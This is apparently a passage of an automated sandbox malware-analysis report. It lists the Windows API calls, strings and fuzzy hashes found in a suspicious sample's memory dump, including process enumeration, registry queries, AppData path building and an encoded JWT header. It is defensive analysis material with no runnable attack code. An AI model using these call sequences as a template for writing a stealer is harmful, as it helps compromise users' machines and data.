                              • Part of subcall function 001419F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00141A57
                              • Part of subcall function 001419F0: lstrcat.KERNEL32(00000000,00000000), ref: 00141A62
                              • Part of subcall function 001419F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00141A91
                              • Part of subcall function 001419F0: lstrlen.KERNEL32(00154FA4), ref: 00141AA3
                              • Part of subcall function 001419F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00141AC4
                              • Part of subcall function 001419F0: lstrcat.KERNEL32(00000000,00154FA4), ref: 00141AD0
                              • Part of subcall function 001419F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00141AFF
                            • sscanf.NTDLL ref: 00141D6A
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00141D86
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00141D96
                            • ExitProcess.KERNEL32 ref: 00141DB3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                            • String ID:
                            • API String ID: 3040284667-0
                            • Opcode ID: 4a7a5f31478039f2d5c92e3ea21d7c05d3dcfec1e85c07007f90f05f74e822f3
                            • Instruction ID: 6b361a289245315bc98162fa1abe8229b26c169f2f29bad6c3e8468c58d8f85b
                            • Opcode Fuzzy Hash: 4a7a5f31478039f2d5c92e3ea21d7c05d3dcfec1e85c07007f90f05f74e822f3
                            • Instruction Fuzzy Hash: 5A21D0B1518341EF8354DF69D88599FBBF8AFD8315F409E1EF599C3260E73095048BA2
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00143336
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0014333D
                            • RegOpenKeyExA.ADVAPI32(80000002,013EC1B0,00000000,00020119,?), ref: 0014335C
                            • RegQueryValueExA.ADVAPI32(?,013FDAB8,00000000,00000000,00000000,000000FF), ref: 00143377
                            • RegCloseKey.ADVAPI32(?), ref: 00143381
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: c6f5933585b12a7383150e07ae9a320ad3574c4eb2f0e9983551d1dc644806de
                            • Instruction ID: bd7d23cd109755de547d187860b73ffd36f16e8608db2ce68f6c546998c4da8f
                            • Opcode Fuzzy Hash: c6f5933585b12a7383150e07ae9a320ad3574c4eb2f0e9983551d1dc644806de
                            • Instruction Fuzzy Hash: 331182B2A40304AFD711CB94ED45FABB77CFB88712F00412AFA05E3290DB7459008BA1
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00128996
                              • Part of subcall function 0014A3D0: std::exception::exception.LIBCMT ref: 0014A3E5
                              • Part of subcall function 0014A3D0: std::exception::exception.LIBCMT ref: 0014A40B
                            • std::_Xinvalid_argument.LIBCPMT ref: 001289CD
                              • Part of subcall function 0014A383: std::exception::exception.LIBCMT ref: 0014A398
                              • Part of subcall function 0014A383: std::exception::exception.LIBCMT ref: 0014A3BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: invalid string position$string too long
                            • API String ID: 2002836212-4289949731
                            • Opcode ID: 591cd722b6c1c71917493d65090189fb5bd6ce07ae2136170540e7d53cbf1b68
                            • Instruction ID: 0e59dbfec5b2217654c6e5d893c299ec19117f1229f0d00c3cf97d3cc2d71e22
                            • Opcode Fuzzy Hash: 591cd722b6c1c71917493d65090189fb5bd6ce07ae2136170540e7d53cbf1b68
                            • Instruction Fuzzy Hash: 8C21D8323012608BCB209A6CF850A7AF7999BA1765B15093FF151CB681CF71DCA1C3E5
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00128883
                              • Part of subcall function 0014A383: std::exception::exception.LIBCMT ref: 0014A398
                              • Part of subcall function 0014A383: std::exception::exception.LIBCMT ref: 0014A3BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            • Opcode ID: 5eb0af6db07f51cdb3695313ad1b377d7c6d4b7acc0f2a05c4c749056aa8fda8
                            • Instruction ID: ce3dbc26b1446d04ca1a4737af3296f56a43165cfda36fce8a73b79ceed7ee2f
                            • Opcode Fuzzy Hash: 5eb0af6db07f51cdb3695313ad1b377d7c6d4b7acc0f2a05c4c749056aa8fda8
                            • Instruction Fuzzy Hash: 8531DBB5E005159FCB08DF58D8906ADBBB6EB98310F14C269E915DF384DB30AD51CBD1
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00145B32
                              • Part of subcall function 0014A383: std::exception::exception.LIBCMT ref: 0014A398
                              • Part of subcall function 0014A383: std::exception::exception.LIBCMT ref: 0014A3BE
                            • std::_Xinvalid_argument.LIBCPMT ref: 00145B45
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_std::exception::exception
                            • String ID: Sec-WebSocket-Version: 13$string too long
                            • API String ID: 1928653953-3304177573
                            • Opcode ID: 29f306b868286d9d88b862b5a584f374608e91a392bb19f11453a419e983394a
                            • Instruction ID: 431448422c13c82a07bbfa2c9becb6ba42eacc18c80f899c891393fa110578ac
                            • Opcode Fuzzy Hash: 29f306b868286d9d88b862b5a584f374608e91a392bb19f11453a419e983394a
                            • Instruction Fuzzy Hash: 58115E31304B508FC7318E2CE810B1AB7E3EBD2721F250B6DE4A18B7A6D761D84587A1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0014A640,000000FF), ref: 00143EF0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00143EF7
                            • wsprintfA.USER32 ref: 00143F07
                              • Part of subcall function 001473F0: lstrcpy.KERNEL32(00000000,ERROR), ref: 0014740E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: f62c968300c8609a997fe4e3bdb00673a1490e2425acf4a7ad76590c9772f956
                            • Instruction ID: cda8b30c41a1bc6ad0d3b6d3f9ec02b1eca4c5edcb0773d06630368c2e05bbc2
                            • Opcode Fuzzy Hash: f62c968300c8609a997fe4e3bdb00673a1490e2425acf4a7ad76590c9772f956
                            • Instruction Fuzzy Hash: 5901D271640310FFE7215B54DC0AF6BBB6CFB45B62F000516FE05972E0D7B41800C6A1
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00128737
                              • Part of subcall function 0014A383: std::exception::exception.LIBCMT ref: 0014A398
                              • Part of subcall function 0014A383: std::exception::exception.LIBCMT ref: 0014A3BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::exception::exception$Xinvalid_argumentstd::_
                            • String ID: vector<T> too long$yxxx$yxxx
                            • API String ID: 2002836212-1517697755
                            • Opcode ID: 9ff41698f0e667dbffdab6539dfd9995bf662069dcb96b45747fea5f3ee11b44
                            • Instruction ID: da7ca47a41962362b46e7e534c0f1a5d1f2adeb75a96640214c9bebada60ba04
                            • Opcode Fuzzy Hash: 9ff41698f0e667dbffdab6539dfd9995bf662069dcb96b45747fea5f3ee11b44
                            • Instruction Fuzzy Hash: 81F02437F000310F8308643DAC800AEB94757E039033AC724E81AEF399EE30EC9281D0
                            APIs
                              • Part of subcall function 001473F0: lstrcpy.KERNEL32(00000000,ERROR), ref: 0014740E
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00143C66
                            • Process32First.KERNEL32(00000000,00000128), ref: 00143C79
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00143C8F
                              • Part of subcall function 00147520: lstrlen.KERNEL32(------,00125BEB), ref: 0014752B
                              • Part of subcall function 00147520: lstrcpy.KERNEL32(00000000), ref: 0014754F
                              • Part of subcall function 00147520: lstrcat.KERNEL32(?,------), ref: 00147559
                              • Part of subcall function 00147490: lstrcpy.KERNEL32(00000000), ref: 001474BE
                            • CloseHandle.KERNEL32(00000000), ref: 00143DC7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 4baaa74ac101e878aa68e8b8726fb7a683eae98a914fe37ca314e406565f1fb2
                            • Instruction ID: 652abf8bc3978e45ef3308f63c94cdf71054973de019fca907d5c8ab7dab8cda
                            • Opcode Fuzzy Hash: 4baaa74ac101e878aa68e8b8726fb7a683eae98a914fe37ca314e406565f1fb2
                            • Instruction Fuzzy Hash: A581F470901215CFCB15CF58D948B95B7F5BB44329F29C1AAD418AB2F2D7369E86CF80
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0013E724
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013E753
                            • lstrcat.KERNEL32(?,00000000), ref: 0013E761
                            • lstrcat.KERNEL32(?,013FD978), ref: 0013E77C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: 1955121f1c29c1c8a8e5e80367bc2c234ccf84b590deb08c1fc2a5deb1cd954c
                            • Instruction ID: d4f5af07ab19db2e18ffb9332f931e16d660ca7e56fc7ab740483eec210bd046
                            • Opcode Fuzzy Hash: 1955121f1c29c1c8a8e5e80367bc2c234ccf84b590deb08c1fc2a5deb1cd954c
                            • Instruction Fuzzy Hash: D151A576A10228AFCB55EB54EC43EEE33BDFB58301F044599F90997291DF70AE858B90
                            APIs
                            Strings
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 001421AF, 001421C5, 00142287
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: strlen
                            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 39653677-4138519520
                            • Opcode ID: 834336696a9341deaa00ad1821247489f63f77ff9dd0827ffb93adaa91b8e719
                            • Instruction ID: 04dcd8717b0e5a0c75a5778c74bb9de8b27af0c362a0858b6a363657575bcd0a
                            • Opcode Fuzzy Hash: 834336696a9341deaa00ad1821247489f63f77ff9dd0827ffb93adaa91b8e719
                            • Instruction Fuzzy Hash: E42149399141898ADB24EB75D860BEDF367EF84362FC44056F81C4B2A1E3B1198AC7D5
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0013ED94
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013EDC3
                            • lstrcat.KERNEL32(?,00000000), ref: 0013EDD1
                            • lstrcat.KERNEL32(?,013FE538), ref: 0013EDEC
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: ecd869c324a72d6857ee4a6bf420fb90cccb5a0854282a50192589bb500cc95b
                            • Instruction ID: a3e7185591bb078b9a1ae51c6c3065f667c88572f42f85d789be58e73cc1fa4d
                            • Opcode Fuzzy Hash: ecd869c324a72d6857ee4a6bf420fb90cccb5a0854282a50192589bb500cc95b
                            • Instruction Fuzzy Hash: B731C971910128ABCB61EF64EC42BED73B8FF58301F1005A9FA05A7295DF309E548B90
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0014A5E0,000000FF), ref: 00142D5F
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00142D66
                            • GetLocalTime.KERNEL32(?,?,00000000,0014A5E0,000000FF), ref: 00142D72
                            • wsprintfA.USER32 ref: 00142D9E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: 0d61c26bcd5b7049630b4b71e55f7cab0df556c2631e3891749d3bea0483de2f
                            • Instruction ID: c0514fafc35bdcff477c24dc250fa06544784c3aef435d9ee91c2b21748b2fa8
                            • Opcode Fuzzy Hash: 0d61c26bcd5b7049630b4b71e55f7cab0df556c2631e3891749d3bea0483de2f
                            • Instruction Fuzzy Hash: 8A0140B2944224ABCB159BC9DD45BBFB7BCFB4CB12F00011AF605A2290E7785440C7B1
                            APIs
                            • OpenProcess.KERNEL32(00000410,00000000), ref: 001446A2
                            • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 001446BD
                            • CloseHandle.KERNEL32(00000000), ref: 001446C4
                            • lstrcpy.KERNEL32(00000000,?), ref: 001446F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                            • String ID:
                            • API String ID: 4028989146-0
                            • Opcode ID: 00b65ab462455fc850f8dac28dca04c757cf4b2579db73dd5fa9c0e8408e8d8c
                            • Instruction ID: a3fd322ec26aa3cab4e9284908f8a33fdabd9570254cd1253a37caeebc506c99
                            • Opcode Fuzzy Hash: 00b65ab462455fc850f8dac28dca04c757cf4b2579db73dd5fa9c0e8408e8d8c
                            • Instruction Fuzzy Hash: 8DF0F6B09017256BE721AB749C49BEABAACAF15305F0005A1FA85D71E0DBB098C18794
                            APIs
                            • __getptd.LIBCMT ref: 001491ED
                              • Part of subcall function 00148A0F: __amsg_exit.LIBCMT ref: 00148A1F
                            • __getptd.LIBCMT ref: 00149204
                            • __amsg_exit.LIBCMT ref: 00149212
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00149236
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: c2b3d4e8645c30e12f1657fdadfcd09fc710d9dabc07f5c32d0f45d1eea1ecb1
                            • Instruction ID: f56a6d76fe3b027cea4205d0d943e5d86756c25d9a5eaed12a512b0cbbd6cf97
                            • Opcode Fuzzy Hash: c2b3d4e8645c30e12f1657fdadfcd09fc710d9dabc07f5c32d0f45d1eea1ecb1
                            • Instruction Fuzzy Hash: 04F0B4B2988710EBD721BB78A807F4E33A16F10721F244149F418AB2F2DFA45A41CA55
                            APIs
                            • lstrlen.KERNEL32(------,00125BEB), ref: 0014752B
                            • lstrcpy.KERNEL32(00000000), ref: 0014754F
                            • lstrcat.KERNEL32(?,------), ref: 00147559
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcatlstrcpylstrlen
                            • String ID: ------
                            • API String ID: 3050337572-882505780
                            • Opcode ID: 1a5e59af63b461e79c1fb2f4368f87f61376f77bc4efc6bedb77142390e7b0b0
                            • Instruction ID: 3b90a6b5b187d61c31de2b1b87527c1d18b209859252a47ee5d1bc6fdf6e0506
                            • Opcode Fuzzy Hash: 1a5e59af63b461e79c1fb2f4368f87f61376f77bc4efc6bedb77142390e7b0b0
                            • Instruction Fuzzy Hash: FFF0ED74911712DFDB219F39D848A27BBF9EF84705714882DA8DACB2A9EB30D840CB10
                            APIs
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121557
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121579
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 0012159B
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 001215FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00133572
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013359B
                            • lstrcpy.KERNEL32(00000000,?), ref: 001335C1
                            • lstrcpy.KERNEL32(00000000,?), ref: 001335E7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: 657b6e0a74006a80a77a7cab84808e8ffabc501e12f4ef11a9a1b622c741b4f3
                            • Instruction ID: b46e7773e943fdd281a3cf252781d4a46f6c21a862c7f351b7d4095f8d6fc12e
                            • Opcode Fuzzy Hash: 657b6e0a74006a80a77a7cab84808e8ffabc501e12f4ef11a9a1b622c741b4f3
                            • Instruction Fuzzy Hash: F7121870A01211CFDB29CF19C554B25B7E4AF44729F29C1AEE819DB3A2D772ED82CB44
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00137DD4
                            • std::_Xinvalid_argument.LIBCPMT ref: 00137DEF
                              • Part of subcall function 00137E80: std::_Xinvalid_argument.LIBCPMT ref: 00137E98
                              • Part of subcall function 00137E80: std::_Xinvalid_argument.LIBCPMT ref: 00137EB6
                              • Part of subcall function 00137E80: std::_Xinvalid_argument.LIBCPMT ref: 00137ED1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: string too long
                            • API String ID: 909987262-2556327735
                            • Opcode ID: 931de28e3d8ccfceebb663b57db9b97d7cd3866619ca5051473620c1537df31e
                            • Instruction ID: 7e360ecdc025b0d711e31c5a62a14b4b0127abc18cf638c9672e07cd96c959fb
                            • Opcode Fuzzy Hash: 931de28e3d8ccfceebb663b57db9b97d7cd3866619ca5051473620c1537df31e
                            • Instruction Fuzzy Hash: 6731E6B23086509BE734DDACE89097AF7E9EF91760F204A3AF4528B6C1D7719C4083E4
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,?), ref: 00126F74
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00126F7B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
